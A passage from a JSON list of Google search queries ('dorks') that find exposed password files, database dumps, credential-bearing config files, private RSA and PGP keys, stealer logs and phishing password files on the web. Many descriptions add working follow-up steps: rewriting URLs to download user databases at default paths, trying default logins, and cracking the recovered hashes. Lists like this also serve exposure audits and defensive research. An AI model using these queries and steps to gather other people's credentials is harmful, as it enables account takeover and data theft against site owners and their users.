plaintext database credentials in ASA and BAK files."}, {"dork": "filetype:sql \"insert into\" (pass|passwd|password)", "description": "Looks for SQL dumps containing cleartext or encrypted passwords."}, {"dork": "inurl:\"calendarscript/users.txt\"", "description": "CalenderScript is an overpriced online calender system written in perl. The passwords are encrypted using perl's crypt() function which I think DES encrypts things. However if the computer the calender script is on doesn't support the crypt function the are plaintext. Changing calender dates might not sound useful but people reuse passwords so who knows? Also search for the logins:intitle:\"Calendar Administration : Login\" | inurl:\"calendar/admin/index.asp\" -demo -demos Then to get the passwords change the url fromwxw.calendersiteexample.com/thissite/calendar_admin.cgitowxw.calendersiteexample.com/thissite/calendarscript/users.txt The defaults are anonymous/anonymous and Administrator/Administrator."}, {"dork": "ext:php intext:\"$dbms\"\"$dbhost\"\"$dbuser\"\"$dbpasswd\"\"$table_prefix\"\"phpbb_installed\"", "description": "Hacking a phpBB forum. Here you can gather the mySQL connection information for their forum database. View the .php info by using Google's cache feature."}, {"dork": "intitle:\"Index of\" .mysql_history", "description": "The .mysql_history file contains commands that were performed against a mysql database. A \"history\" of said commands. First, you shouldn't show this file to anyone, especially not a MAJOR SEARCH ENGINE! Secondly, I sure hope you wouldn't type anything sensitive while interacting with your databases, like oh say USERNAMES AND PASSWORDS..."}, {"dork": "intitle:index.of intext:\"secring.skr\"|\"secring.pgp\"|\"secring.bak\"", "description": "PGP is a great encryption technology. It keeps secrets safe. Everyone from drug lords to the head of the DEA can download PGP to encrypt their sensitive documents. Everyone, that is except googleDorks. GoogleDorks, it seems, don't understand that anyone in possession of your private keyring (secring) can get to your secret stuff. It should noever be given out, and should certainly not be posted on the Internet. The highest ranking is awarded for this surprising level of ineptitude."}, {"dork": "intitle:index.of passwd passwd.bak", "description": "There's nothing that defines a googleDork more than getting your PASSWORDS grabbed by Google for the world to see. Truly the epitome of a googleDork. The hits in this search show \"passwd\" files which contain encrypted passwords which may look like this: \"guest MMCHhvZ6ODgFo\" A password cracker can eat cheesy hashes faster than Elvis eatin' jelly doughnuts. Bravo googleDorks! Good show!"}, {"dork": "intitle:index.of master.passwd", "description": "There's nothing that defines a googleDork more than getting your PASSWORDS grabbed by Google for the world to see. Truly the epitome of a googleDork. The hits in this search show \"master.passwd\" files which contain encrypted passwords which may look like this: \"guest MMCHhvZ6ODgFo\" A password cracker can eat cheesy hashes faster than Elvis eatin' jelly doughnuts. Bravo googleDorks! Good show!For master.passwd, be sure to check other files in the same directory..."}, {"dork": "intitle:\"Index of\" pwd.db", "description": "There's nothing that defines a googleDork more than getting your PASSWORDS grabbed by Google for the world to see. Truly the epitome of a googleDork. The his in this search show \"pwd.db\" files which contain encrypted passwords which may look like this: \"guest MMCHhvZ6ODgFo\" A password cracker can eat cheesy hashes faster than Elvis eatin' jelly doughnuts. Bravo googleDorks! Good show!"}, {"dork": "intitle:\"Index of\" \".htpasswd\" htpasswd.bak", "description": "There's nothing that defines a googleDork more than getting your PASSWORDS grabbed by Google for the world to see. Truly the epitome of a googleDork. And what if the passwords are hashed? A password cracker can eat cheesy password hashes faster than Elvis eatin' jelly doughnuts. Bravo googleDorks! Good show!"}, {"dork": "intitle:\"Index of\" \".htpasswd\" \"htgroup\" -intitle:\"dist\" -apache -htpasswd.c", "description": "There's nothing that defines a googleDork more than getting your PASSWORDS grabbed by Google for the world to see. Truly the epitome of a googleDork. And what if the passwords are hashed? A password cracker can eat cheesy password hashes faster than Elvis eatin' jelly doughnuts. Bravo googleDorks! Good show!You'll need to sift through these results a bit..."}, {"dork": "intitle:\"Index of\" spwd.db passwd -pam.conf", "description": "There's nothing that defines a googleDork more than getting your PASSWORDS grabbed by Google for the world to see. Truly the epitome of a googleDork. And what if the passwords are hashed? A password cracker can eat cheesy password hashes faster than Elvis eatin' jelly doughnuts. Bravo googleDorks! Good show!"}, {"dork": "intitle:\"Index of..etc\" passwd", "description": "There's nothing that defines a googleDork more than getting your PASSWORDS grabbed by Google for the world to see. Truly the epitome of a googleDork. And what if the passwords are hashed? A password cracker can eat cheesy password hashes faster than Elvis eatin' jelly doughnuts. Bravo googleDorks! Good show!"}, {"dork": "inurl:config/databases.yml -trac -trunk -\"Google Code\" -source -repository", "description": "Google search for web site build with symfony framework. This file\ncontains the login / password for the databases\nAuthor: Simon Leblanc"}, {"dork": "filetype:ini \"pdo_mysql\" (pass|passwd|password|pwd)", "description": "full details dbname dbuser dbpass all plain text\nAuthor:Bastich"}, {"dork": "filetype:ini \"SavedPasswords\" (pass|passwd|password|pwd)", "description": "Unreal Tournament config, plain text passwords Author: Bastich"}, {"dork": "filetype:ini \"precurio\" (pass|passwd|password|pwd)", "description": "plain text passwods"}, {"dork": "filetype:ini \"[FFFTP]\" (pass|passwd|password|pwd)", "description": "Asian FTP software -, run the password hash through John etc. Author: Bastich"}, {"dork": "filetype:sql \"PostgreSQL database dump\" (pass|password|passwd|pwd)", "description": "PostgreSQL database dump with passwords\nBastich"}, {"dork": "filetype:sql \"MySQL dump\" (pass|password|passwd|pwd)", "description": "MySQL database dump with passwords\nBastich"}, {"dork": "filetype:sql \"phpmyAdmin SQL Dump\" (pass|password|passwd|pwd)", "description": "phpMyAdmin SQL dump with passwords\nBastich"}, {"dork": "inurl:\"/Application Data/Filezilla/*\" OR inurl:\"/AppData/Filezilla/*\" filetype:xml", "description": "this dork locates files containing ftp passwords"}, {"dork": "filetype:sql inurl:wp-content/backup-*", "description": "Search for WordPress MySQL database backup. Author: AngelParrot"}, {"dork": "(username=* | username:* |) | ( ((password=* | password:*) | (passwd=* | passwd:*) | (credentials=* | credentials:*)) | ((hash=* | hash:*) | (md5:* | md5=*)) | (inurl:auth | inurl:passwd | inurl:pass) ) filetype:log", "description": "Logged username, passwords, hashes\nAuthor: GhOsT-PR"}, {"dork": "filetype:cfg \"radius\" (pass|passwd|password)", "description": "Find config files with radius configs and passwords and secrets...\nLove\nBastich"}, {"dork": "inurl:\"passes\" OR inurl:\"passwords\" OR inurl:\"credentials\" -search -download -techsupt -git -games -gz -bypass -exe filetype:txt @yahoo.com OR @gmail OR @hotmail OR @rediff", "description": "Hack the $cr1pt kiddies.\nThere are a lot of Phishing pages hosted on internet , this dork will\nprovide you with their password files. Clean and Simple\ngr00ve_hack3r\nwww.gr00vehack3r.wordpress.com"}, {"dork": "intext:charset_test= email= default_persistent=", "description": "find facebook email and password ;)"}, {"dork": "\"BEGIN RSA PRIVATE KEY\" filetype:key -github", "description": "To find private RSA Private SSL Keys"}, {"dork": "ext:sql intext:@gmail.com intext:password", "description": "author:haji"}, {"dork": "inurl:typo3conf/localconf.php", "description": "typo3 passwords :-)\nBruno Schmid"}, {"dork": "xamppdirpasswd.txt filetype:txt", "description": "xamppdirpasswd.txt filetype:txt"}, {"dork": "inurl:ws_ftp.ini \"[WS_FTP]\" filetype:ini", "description": "inurl:ws_ftp.ini \"[WS_FTP]\" filetype:ini\nFiles containing passwords\nBy Dr4GoR1Ty"}, {"dork": "\"automatic teller\" \"operator manual\" \"password\" filetype:pdf", "description": "ATM Passwords\n\"automatic teller\" \"operator manual\" \"password\" filetype:pdf"}, {"dork": "ext:xls intext:NAME intext:TEL intext:EMAIL intext:PASSWORD", "description": "Dork who collects a lot of data in excel file.\nBy Rootkit Pentester."}, {"dork": "intext:smtp | pop3 intext:login | logon intext:password | passcode filetype:xls | filetype:xlsx", "description": "Spreadsheets with pop3 and smtp login details.\nDecoy"}, {"dork": "inurl:\"ftp\" intext:\"user\" | \"username\" | \"userID\" | \"user ID\" | \"logon\" | \"login\" intext:\"password\" | \"passcode\" filetype:xls | filetype:xlsx", "description": "Passwords :D\nDecoy"}, {"dork": "intext:http | https intext:login | logon intext:password | passcode filetype:xls | filetype:xlsx", "description": "Files with Passwords of http and https servers in format xls and xlsx.\nEnjoy well.\nDork By Rootkit Pentester."}, {"dork": "intext:\"GET http://\" ext:txt intext:\"password\" inurl:log", "description": "this dork will return password sent in GET request from proxies logs.\nsubmitted by: Mohammad Al-Nasser"}, {"dork": "inurl:wp-content/uploads filetype:xls | filetype:xlsx password", "description": "inurl:wp-content/uploads filetype:xls | filetype:xlsx password"}, {"dork": "\"Password=\" inurl:web.config -intext:web.config ext:config", "description": "This Dork show Passwords of web.config files.\nEnjoy them!.\nDork by Rootkit Pentester."}, {"dork": "filetype:pcf \"cisco\" \"GroupPwd\"", "description": "Cisco VPN files with Group Passwords for remote access"}, {"dork": "site:github.com ext:csv userid | username | user -example password", "description": "Whoops.\nsite:github.com ext:csv userid | username | user -example password\nDecoy"}, {"dork": "\"INSERT INTO phpbb_users\" ext:sql", "description": "Finds files with usernames and hashed passwords!\r\n\r\n\r\n\r\nDxtroyer"}, {"dork": "\"END_FILE\" inurl:\"/password.log\"", "description": "Finds user-specific login info.\r\n\r\n\r\n\r\nDxtroyer"}, {"dork": "\"# -FrontPage-\" ext:pwd", "description": "Finds MS Frontpage passwords!\r\n\r\n\r\n\r\nDxtroyer"}, {"dork": "\"-----BEGIN RSA PRIVATE KEY-----\" ext:key", "description": "Some hashes (passwords, certs, etc.)\r\n\r\n\r\n\r\nDxtroyer"}, {"dork": "inurl:\"/zebra.conf\" ext:conf -git", "description": "Finds GNU Zebra login credentials\nDxtroyer"}, {"dork": "\"Stealer by W33DY\" ext:txt", "description": "Finds stealer logs with usernames, passwords and sites to input them!\nDxtroyer"}, {"dork": "ext:reg \" [HKEY_CURRENT_USER\\Software\\ORL\\WinVNC3]\" -git", "description": "Finds files with WinVNC passwords\nDxtroyer"}, {"dork": "\"resources.db.params.password\" ext:ini -git", "description": "Finds lots of database usernames & passwords!\nDxtroyer"}, {"dork": "site:pastebin.com intext:\"*@*.com:*\"", "description": "site:pastebin.com intext:\"*@*.com:*\"\nFinds pastebin.com dumped mail lists with passwords\nTPNight"}, {"dork": "intext:DB_PASSWORD || intext:\"MySQL hostname\" ext:txt", "description": "Google Dork: intext:DB_PASSWORD || intext:\"MySQL hostname\" ext:txt\nAuthor: Tarkan Catal X\nThis dork allows you to search for WordPress configuration file.\nThis file contains Username, Password, Secret Keys and other juicy information."}, {"dork": "inurl:\"sitemanager.xml\" ext:xml -git", "description": "Finds FileZilla site manager files, containing FTP usernames and passwords\nDxtroyer"}, {"dork": "inurl:_vti_pvt/administrators.pwd", "description": "Here is a Google Dork to retrieve *sensitive information Login/password for\nMS FrontPage share point*\ninurl:_vti_pvt/administrators.pwd\nSold1er ."}, {"dork": "intitle:\"Index Of\" intext:.ftpconfig", "description": "Description :\nFTP/SFTP credentials in .ftpconfig file from Atom text editor.\nDork : intitle:\"Index Of\" intext:.ftpconfig\n~Vocuzi"}, {"dork": "intext:connectionString & inurl:web & ext:config", "description": "*Category:*\nFiles containing passwords\n*Summary:*\nA Google dork that gives SQL connection information (sql server ip,\nusername and password).\n*Dork discovered by:*\nGoktug Serez\nhttps://endpoint-labs.com"}, {"dork": "filetype:ini \"FtpInBackground\" (pass|passwd|password|pwd)", "description": "Total commander wxc_ftp.ini run has through John etc. or even better use\nhttp://wcxftp.org.ru/"}, {"dork": "intitle:index.of config.php", "description": "This search brings up sites with \"config.php\" files. To skip the technical discussion, this configuration file contains both a username and a password for an SQL database. Most sites with forums run a PHP message base. This file gives you the keys to that forum, including FULL ADMIN access to the database. Way to go, googleDorks!!"}, {"dork": "index.of passlist", "description": "I'm not sure what uses this, but the passlist and passlist.txt files contain passwords in CLEARTEXT! That's right, no decoding/decrypting/encrypting required. How easy is this?*sigh*Supreme googledorkage"}, {"dork": "index.of.etc", "description": "This search gets you access to the etc directory, where many many many types of password files can be found. This link is not as reliable, but crawling etc directories can be really fun!"}, {"dork": "filetype:xls username password email", "description": "This search shows Microsoft Excel spreadsheets containing the words username, password and email. Beware that there are a ton of blank \"template\" forms to weed through, but you can tell from the Google summary that some of these are winners... err losers.. depending on your perspective."}, {"dork": "allinurl:auth_user_file.txt", "description": "DCForum's password file. This file gives a list of (crackable) passwords, usernames and email addresses for DCForum and for DCShop (a shopping cart program(!!!). Some lists are bigger than others, all are fun, and all belong to googledorks. =)"}, {"dork": "inurl:config.php dbuname dbpass", "description": "The old config.php script. This puppy should be held very closely. It should never be viewable to your web visitors because it contains CLEARTEXT usernames and passwords!The hishest of all googledorks ratings!"}, {"dork": "intitle:index.of trillian.ini", "description": "Trillian pulls together all sort of messaging clients like AIM MSN, Yahoo, IRC, ICQ, etc. The various ini files that trillian uses include files like aim.ini and msn.ini. These ini files contain encoded passwords, usernames, buddy lists, and all sorts of other fun things. Thanks for putting these on the web for us, googledorks!"}, {"dork": "filetype:htpasswd htpasswd", "description": "This is a nifty way to find htpasswd files. Htpasswd files contain usernames and crackable passwords for web pages and directories. They're supposed to be server-side, not available to web clients! *duh*"}, {"dork": "intitle:index.of administrators.pwd", "description": "This file contains administrative user names and (weakly) encrypted password for Microsoft Front Page. The file should not be readble to the general public."}, {"dork": "inurl:secring ext:skr | ext:pgp | ext:bak", "description": "This file is the secret keyring for PGP encryption. Armed with this file (and perhaps a passphrase), a malicious user can read all your encrypted files! This should not be posted on the web!"}, {"dork": "intitle:Index.of etc shadow", "description": "This file contains usernames and (lame) encrypted passwords! Armed with this file and a decent password cracker, an attacker can crack passwords and log into a UNIX system."}, {"dork": "allinurl: admin mdb", "description": "Not all of these pages are administrator's access databases containing usernames, passwords and other sensitive information, but many are!"}, {"dork": "filetype:cfm \"cfapplication name\" password", "description": "These files contain ColdFusion source code. In some cases, the pages are examples that are found in discussion forums. However, in many cases these pages contain live sourcecode with usernames, database names or passwords in plaintext."}, {"dork": "eggdrop filetype:user user", "description": "These are eggdrop config files. Avoiding a full-blown descussion about eggdrops and IRC bots, suffice it to say that this file contains usernames and passwords for IRC users."}, {"dork": "intitle:\"index of\" intext:connect.inc", "description": "These files often contain usernames and passwords for connection to mysql databases. In many cases, the passwords are not encoded or encrypted."}, {"dork": "inurl:perform filetype:ini", "description": "Displays the perform.ini file used by the popular irc client mIRC. Often times has channel passwords and/or login passwords for nickserv."}, {"dork": "filetype:properties inurl:db intext:password", "description": "The db.properties file contains usernames, decrypted passwords and even hostnames and ip addresses of database servers. This is VERY severe, earning the highest danger rating."}, {"dork": "filetype:inc intext:mysql_connect", "description": "INC files have PHP code within them that contain unencrypted usernames, passwords, and addresses for the corresponding databases. Very dangerous stuff. The mysql_connect file is especially dangerous because it handles the actual connection and authentication with the database."}, {"dork": "filetype:reg reg HKEY_CURRENT_USER SSHHOSTKEYS", "description": "This search reveals SSH host key fro the Windows Registry. These files contain information about where the user connects including hostnames and port numbers, and shows sensitive information such as the SSH host key in use by that client."}, {"dork": "inurl:vtund.conf intext:pass -cvs", "description": "Theses are vtund configuration files (http://vtun.sourceforge.net). Vtund is an encrypted tunneling program. The conf file holds plaintext passwords. Many sites use the default password, but some do not. Regardless, attackers can use this information to gather information about a site."}, {"dork": "filetype:log inurl:\"password.log\"", "description": "These files contain cleartext usernames and passwords, as well as the sites associated with those credentials. Attackers can use this information to log on to that site as that user."}, {"dork": "filetype:dat \"password.dat\"", "description": "This file contains plaintext usernames and password. Deadly information in the hands of an attacker."}, {"dork": "filetype:conf slapd.conf", "description": "slapd.conf is the file that contains all the configuration for OpenLDAP, including the root password, all in clear text. Other useful information that can be gleaned from this file includes full paths of other related installed applications, the r/w/e permissions for various files, and a bunch of other stuff."}, {"dork": "filetype:inc dbconn", "description": "This file contains the username and password the website uses to connect to the db. Lots of these Google results don't take you straight to 'dbconn.inc', instead they show you an error message -- that shows you exactly where to find dbconn.inc!!"}, {"dork": "filetype:ini ws_ftp pwd", "description": "The encryption method used in WS_FTP is _extremely_ weak. These files can be found with the \"index of\" keyword or by searching directly for the PWD= value inside the configuration file."}, {"dork": "signin filetype:url", "description": "Javascript for user validation is a bad idea as it shows cleartext user/pass combos. There is one googledork who forgot that."}, {"dork": "filetype:dat wand.dat", "description": "The world-famous web-browser Opera has the ability to save the password for you, and it call the system \"Magic Wand\". When on a site, you can save the username and password to the magic wand, then on the site again, click the magic wand icon and it will fill it out automaticly for you. What a joy! Opera saves this file on you'r computer, it is located (on winXP) here: D:\\Documents and Settings\\Peefy\\Programdata\\Opera\\Opera75\\profile\\wand.dat for me offcourse, change it so its suitable for you..But, if you don't have a descrambler or whatever, the passwords arent cleartext, but you have to put the wand file in the location specified above, then open opera, click tools, Wand Passwords, then see the URL's saved, then go to theese URL's and click the wand button."}, {"dork": "filetype:cfg mrtg \"target[*]\" -sample -cvs -example", "description": "Mrtg.cfg is the configuration file for polling SNMP enabled devices. The community string (often 'public') is found in the line starting with target:#Target[test]: 1.3.6.1.4.1.2021.10.1.5.1&1.3.6.1.4.1.2021.10.1.5.2:public@localhostRemember not all targets are SNMP devices. Users can monitor CPU info for example."}, {"dork": "filetype:ldb admin", "description": "According to filext.com, the ldb file is \"A lock file is used to keep muti-user databases from being changed in the same place by two people at the same time resulting in data corruption.\" These Access lock files contain the username of the last user and they ALWAYS have the same filename and location as the database. Attackers can substitute mdb for ldb and dowload the database file."}, {"dork": "filetype:sql +\"IDENTIFIED BY\" -cvs", "description": "Database maintenance is often automated by use of .sql files wich may contain many lines of batched SQL commands. These files are often used to create databases and set or alter permissions. The passwords used can be either encrypted or even plaintext.An attacker can use these files to acquire database permissions that normally would not be given to the masses."}, {"dork": "filetype:sql password", "description": "Database maintenance is often automated by use of .sql files that contain many lines of batched SQL commands. These files are often used to create databases and set or alter permissions. The passwords used can be either encrypted or even plaintext.An attacker can use these files to acquire database permissions that normally would not be given to the masses."}, {"dork": "filetype:pwd service", "description": "Microsoft Frontpage extensions appear on virtually every type of scanner. In the late 90's people thought they where hardcore by defacing sites with Frontpage. Today, there are still vulnerable servers found with Google. An attacker can simply take advantage from administrators who 'forget' to set up the policies for Frontpage extensions. An attacker can also search for 'filetype:pwd users'."}, {"dork": "inurl:zebra.conf intext:password -sample -test -tutorial -download", "description": "GNU Zebra is free software that manages TCP/IP based routing protocols. It supports BGP-4 protocol as well as RIPv1, RIPv2 and OSPFv2.The zebra.conf uses the same format as the cisco config files. There is an enable password (plain text or encrypted) and ipv6 tunnel definitions, hostnames, ethernet interface names, ip routing information, etc."}, {"dork": "inurl:ospfd.conf intext:password -sample -test -tutorial -download", "description": "GNU Zebra is free software that manages TCP/IP based routing protocols. It supports BGP-4 protocol as well as RIPv1, RIPv2 and OSPFv2.The ospfd.conf uses the same format as the cisco config files. There is an enable password (plain text or encrypted) and ipv6 tunnel definitions, hostnames, ethernet interface names, ip routing information, etc."}, {"dork": "inurl:ccbill filetype:log", "description": "CCBill.com sells E-tickets to online entertainment and subscription-based websites. CCBill.com gives consumers access to the hottest entertainment sites on the World Wide Web. The word \"hot\" in this context seems apropriate when considering the type of sites that use e-tickets :)CCBill log files contain usernames and password information, but are protected with DES encryption. An attacker can crack these using the information provided on this site: http://www.jaddo.net/forums/index.php?&act=ST&f=19&t=4242."}, {"dork": "filetype:mdb inurl:users.mdb", "description": "Everyone has this problem, we need to remember many passwords to access the resources we use. Some believe it is a good solution to use Microsoft Access as a password database..An attacker can find and download those mdb files easily with Google. This search tries to find such \"user\" databases. Some are password protected, many are not. Weee!"}, {"dork": "filetype:conf inurl:psybnc.conf \"USER.PASS=\"", "description": "psyBNC is an IRC-Bouncer with many features. It compiles on Linux, FreeBSD, SunOs and Solaris. The configuration file for psyBNC is called psybnc.conf (duh).An attacker can use the password, host and portinformation in this file to bounce his IRC connection through these bouncers, providing some privacy or just to show off some fancy irc hostname that are usually linked to those IP addresses."}, {"dork": "\"Your password is * Remember this for later use\"", "description": "NickServ allows you to \"register\" a nickname (on some IRC networks) and prevent others from using it. Some channels also require you to use a registered nickname to join.This search contains the the nickserv response message to a nick registration. Lots of example sites, but some that aren't... you can see which ones are fake or not in the search (some are like, your_password, while other are more realistic ones)."}, {"dork": "inurl:lilo.conf filetype:conf password -tatercounter2000 -bootpwd -man", "description": "LILO is a general purpose boot manager that can be used to boot multiple operating systems, including Linux. The normal configuration file is located in /etc/lilo.conf. Each bootable image can be protected by a password if needed. Please note that all searches for configuration files will contain at least some false positives."}, {"dork": "intitle:\"Index of\" passwords modified", "description": "These directories are named \"password.\" I wonder what you might find in here. Warning: sometimes p0rn sites make directories on servers with directories named \"password\" and single html files inside named things liks \"horny.htm\" or \"brittany.htm.\" These are to boost their search results. Don't click them (unless you want to be buried in an avalanche of p0rn...Moderator note: This is a cleanup of a previous googledork, improving the results by using \"intitle\" and an extra keyword from the index page (in this case modified)."}, {"dork": "\"sets mode: +k\"", "description": "This search reveals channel keys (passwords) on IRC as revealed from IRC chat logs."}, {"dork": "filetype:pwl pwl", "description": "These are Windows Password List files and have been known to be easy to crack since the release of Windows 95. An attacker can use the PWLTools to decode them and get the users passwords. The following example has been provided:---Resource table: 0292 0294 0296 0298 (..etc..)File: C:\\Downloads\\2004-07\\07-26\\USER1.PWLUser name: 'USER1'Password: ''Dial-up:'*Rna\\Internet\\PJIU_TAC'Password:'PJIUSCAC3000' ---"}, {"dork": "inurl:/wwwboard", "description": "The software wwwboard stores its passwords in a file called \"passwd.txt\".An attacker may try to search forinurl:/wwwboardthen add a \"passwd.txt\" to it (../wwwboard/passwd.txt) and decrypt des DES passwords."}, {"dork": "\"AutoCreate=TRUE password=*\"", "description": "This searches the password for \"Website Access Analyzer\", a Japanese software that creates webstatistics. For those who can read Japanese, check out the author's site at: http://www.coara.or.jp/~passy/Note: google to find the results of this software."}, {"dork": "filetype:pass pass intext:userid", "description": "Generally, these are dbman password files. They are not cleartext, but still allow an attacker to harvest usernames and optionally crack passwords offline."}, {"dork": "inurl:nuke filetype:sql", "description": "This search reveals database dumps that most likely relate to the php-nuke or postnuke content management systems. These database dumps contain usernames and (sometimes) encrypted passwords for users of the system."}, {"dork": "inurl:/db/main.mdb", "description": "ASP-Nuke database file containing passwords.This search goes for the direct location and has few results. For more hits an attacker would try to find ASP-Nuke sites another way (search googledorks for them) and change the URL to the database location."}, {"dork": "filetype:bak inurl:\"htaccess|passwd|shadow|htusers\"", "description": "This will search for backup files (*.bak) created by some editors or even by the administrator himself (before activating a new version). Every attacker knows that changing the extenstion of a file on a webserver can have ugly consequences."}, {"dork": "\"http://*:*@www\" bob:bob", "description": "This is a query to get inline passwords from search engines (not just Google), you must type in the query followed with the the domain name without the .com or .net\"http://*:*@www\" bangbus or \"http://*:*@www\"bangbusAnother way is by just typing\"http://bob:bob@www\""}, {"dork": "filetype:conf oekakibbs", "description": "Oekakibss is a japanese anime creation application. The config file tells an attacker the encrypted password."}, {"dork": "LeapFTP intitle:\"index.of./\" sites.ini modified", "description": "The LeapFTP client configuration file \"sites.ini\" holds the login credentials for those sites in plain text. The passwords seems to be encrypted."}, {"dork": "filetype:ini wcx_ftp", "description": "This searches for Total commander FTP passwords (encrypted) in a file called wcx_ftp.ini. Only 6 hits at the moment, but there may be more in the future."}, {"dork": "filetype:config config intext:appSettings \"User ID\"", "description": "These files generally contain configuration information for a .Net Web Application. Things like connection strings to databases file directories and more. On a properly setup IIS these files are normally not served to the public."}, {"dork": "\"index of/\" \"ws_ftp.ini\" \"parent directory\"", "description": "This search is a cleanup of a previous entry by J0hnny. It uses \"parent directory\" to avoid results other than directory listings.WS_FTP.ini is a configuration file for a popular win32 FTP client that stores usernames and weakly encoded passwords. There is another way to find this file, that was added by Xewan:filetype:ini ws_ftp pwdIn our experience it's good to try both methods, as the results will differ quite a bit."}, {"dork": "filetype:mdb wwforum", "description": "Web Wiz Forums is a free ASP Bulletin Board software package. It uses a Microsoft Access database for storage. The installation instructions clearly indicate to change the default path and filename (admin/database/wwForum.mdb).vendor: http://www.webwizguide.info/web_wiz_forums/The forum database contains the members passwords, either encrypted or in plain text, depending on the version.Please note: this search is proof that results can stay in Google's index for a long time, even when they are not on the site any longer. Currently only 2 out of 9 are actually still downloadable by an attacker."}, {"dork": "\"Powered By Elite Forum Version *.*\"", "description": "Elite forums is one of those Microsoft Access .mdb file based forums. This one is particularly dangerous, because the filename and path are hardcoded in the software. An attacker can modify index.php for ./data/users/userdb.dat, open the file and see something like this:42administrat4571XXX367b52XXXb33b6ce74df1e0170(data was xx'd)These are MD5 digests and can be brute forced (with enough time) or dictionary cracked by a malicious user, thus giving adminstrator access to the forum."}, {"dork": "filetype:ini inurl:flashFXP.ini", "description": "FlashFXP offers the easiest and fastest way to transfer any file using FTP, providing an exceptionally stable and robust program that you can always count on to get your job done quickly and efficiently. There are many, many features available in FlashFXP.The flashFXP.ini file is its configuration file and may contain usernames/passwords and everything else that is needed to use FTP."}, {"dork": "inurl:chap-secrets -cvs", "description": "linux vpns store their usernames and passwords for CHAP authentification in a file called \"chap-secrets\" where the usernames and the passwords are in cleartext."}, {"dork": "inurl:pap-secrets -cvs", "description": "linux vpns store there usernames and passwords for PAP authentification in a file called \"pap-secrets\" where the usernames and the passwords are in cleartext."}, {"dork": "filetype:ini inurl:\"serv-u.ini\"", "description": "serv-U is a ftp/administration server for Windows. This file leaks info about the version, username and password. Passwords are in encrypted, but there is a decryption program available on the Net. An attacker could use this search to upload dangerous code etc."}, {"dork": "\"liveice configuration file\" ext:cfg -site:sourceforge.net", "description": "This finds the liveice.cfg file which contains all configuration data for an Icecast server. Passwords are saved unencrypted in this file."}, {"dork": "intext:\"enable secret 5 $\"", "description": "sometimes people make mistakes and post their cisco configs on \"help sites\" and don't edit the sensitive fields first. Don't forget to also query Google Groups for this string."}, {"dork": "\"powered by ducalendar\" -site:duware.com", "description": "Most duware products use Microsoft Access databases in default locations without instructing the users to change them. The plain text admin passwords are just a click away for any attacker who knows how to type an URL. For Ducalendar it's: /ducalendar/_private/ducalendar.mdb"}, {"dork": "\"Powered by Duclassified\" -site:duware.com", "description": "Most duware products use Microsoft Access databases in default locations without instructing the users to change them. The plain text admin passwords are just a click away for any attacker who knows how to type an URL. For Duclassified it's: /duclassified/_private/duclassified.mdb"}, {"dork": "\"Powered by Dudirectory\" -site:duware.com", "description": "Most duware products use Microsoft Access databases in default locations without instructing the users to change them. The plain text admin passwords are just a click away for any attacker who knows how to type an URL. For DuDirectory it's: /dudirectory/_private/dudirectory.mdb"}, {"dork": "\"Powered by Duclassified\" -site:duware.com \"DUware All Rights reserved\"", "description": "Most duware products use Microsoft Access databases in default locations without instructing the users to change them. The plain text admin passwords are just a click away for any attacker who knows how to type an URL. For Duclassified it's: /duclassified/_private/duclassified.mdb"}, {"dork": "\"powered by duclassmate\" -site:duware.com", "description": "Most duware products use Microsoft Access databases in default locations without instructing the users to change them. The plain text admin passwords are just a click away for any attacker who knows how to type an URL. For Duclassmate it's: /duclassmate/_private/duclassmate.mdb"}, {"dork": "intitle:dupics inurl:(add.asp | default.asp | view.asp | voting.asp) -site:duware.com", "description": "Most duware products use Microsoft Access databases in default locations without instructing the users to change them. The plain text admin passwords are just a click away for any attacker who knows how to type an URL. For Dupics rename location to ../_private/dupics.mdb"}, {"dork": "\"powered by dudownload\" -site:duware.com", "description": "Most duware products use Microsoft Access databases in default locations without instructing the users to change them. The plain text admin passwords are just a click away for any attacker who knows how to type an URL. rename ../xxx to ../_private/dudownload.mdb"}, {"dork": "filetype:log \"See `ipsec --copyright\"", "description": "BARF log filesMan page:Barf outputs (on standard output) a collection of debugging information (contents of files, selections from logs, etc.) related to the IPSEC encryption/authentication system. It is primarily a convenience for remote debugging, a single command which packages up (and labels) all information that might be relevant to diagnosing a problem in IPSEC."}, {"dork": "inurl:\"GRC.DAT\" intext:\"password\"", "description": "symantec Norton Anti-Virus Corporate Edition data file containing encrypted passwords."}, {"dork": "inurl:filezilla.xml -cvs", "description": "filezilla.xml contains Sites,Logins and crypted Passwords of ftp connections made with the open source programm filezilla."}, {"dork": "intext:\"powered by Web Wiz Journal\"", "description": "Web Wiz Journal ASP Blog. The MDB database is mostly unprotected and can be downloaded directly. The DB contains administrative acccountsfilename: journal.mdbadmin login: admin.html"}, {"dork": "ext:ini eudora.ini", "description": "Well, this is the configuration file for Eudora...may contain sensitive information like pop servers, logins and encypted passwords sometimes."}, {"dork": "ext:ini Version=4.0.0.4 password", "description": "The servU FTP Daemon ini file contains setting and session information including usernames, passwords and more. This is a more specific search for ServU passwords base on a previous dork by Cybercide."}, {"dork": "filetype:inc mysql_connect OR mysql_pconnect", "description": "INC files have PHP code within them that contain unencrypted usernames, passwords, and addresses for the corresponding databases. Very dangerous stuff. The mysql_connect file is especially dangerous because it handles the actual connection and authentication with the database."}, {"dork": "\"Powered by DUpaypal\" -site:duware.com", "description": "Here is another DUware product, DUpaypal. Once you get hold of the database it contains the admin username and password. The default by the way is admin/passwordThe default location for the database is ../_private/DUpaypal.mdb"}, {"dork": "\"Powered by Link Department\"", "description": "Link management script with advanced yet easy to use admin control panel, fully template driven appearance, static HTML front-end and email notifications.Below the link list a folder 'ld' exists which contains various juicy information like encrypted admin passwords and session data."}, {"dork": "intitle:\"Index of\" sc_serv.conf sc_serv content", "description": "This dork lists sc_serv.conf files. These files contain information for Shoutcast servers and often contain cleartext passwords.Original dork: filetype:conf sc_serv.confCleaned by: c0wzClean date: 2005-04-26"}, {"dork": "filetype:sql (\"passwd values\" | \"password values\" | \"pass values\" )", "description": "Find insert statements where the field (or table name) preceding the operator VALUES will be 'password' or 'passwd' or 'pass'. The rest of the statement should contain encrypted or plaintext password.An attacker can use these files to acquire database permissions that normally would not be given to the masses."}, {"dork": "ext:txt inurl:unattend.txt", "description": "the unattend.txt is used to drive unanttended MS Windows installations. The files contain all information for a Windows information including Administrator's passwords, IP addresses and product IDs."}, {"dork": "filetype:inf sysprep", "description": "sysprep is used to drive unanttended MS Windows installations. The files contain all information for a Windows information including Administrator's passwords, IP addresses and product IDs."}, {"dork": "wwwboard WebAdmin inurl:passwd.txt wwwboard|webadmin", "description": "This is a filtered version of previous 'inurl:passwd' searches, focusing on WWWBoard [1]. There are different crypt functions involved [2], 